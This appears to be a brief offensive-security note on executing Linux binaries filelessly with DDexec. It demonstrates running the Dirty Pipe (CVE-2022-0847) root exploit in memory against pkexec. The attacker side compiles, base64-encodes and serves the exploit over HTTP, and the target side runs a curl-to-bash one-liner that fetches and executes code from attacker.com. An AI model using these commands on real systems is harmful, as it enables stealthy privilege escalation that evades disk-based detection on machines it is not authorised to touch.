A technique to run binaries filelessly and stealthily on Linux Without Touching Disk. 138 words.
Created
Last Updated
Last Updated
Executing Linux Binaries Without Touching Disk
Limitation
This attack depends on the following tools to work.
dd
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep
Example of Running Dirty Pipe exploit in memory without touching the disk to gain root privielges.
Running Dirty Pipe exploit on the target machine without touching the disk. Dirty pip exploit needs a setuid binary we will use /usr/bin/pkexec which is a setuid binary to gain privielge escalation.
In Attacker machine.
# Download & compile the dirty pipe
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/blob/main/exploit-2.c
gcc exploit-2.c -o dp-setuid
# Base64 encode the dp-setuid.
base64 -w0 ./dp-setuid > dp-setuid.b64
# Download DDexec.
https://github.com/arget13/DDexec
# Run http listenor
python3 -m http.server 80
In Target machine.
# Run the following command
curl attacker.com/dp-setuid.b64 | bash <(curl attacker.com/ddexec.sh) /bin/randomename /usr/bin/pkexec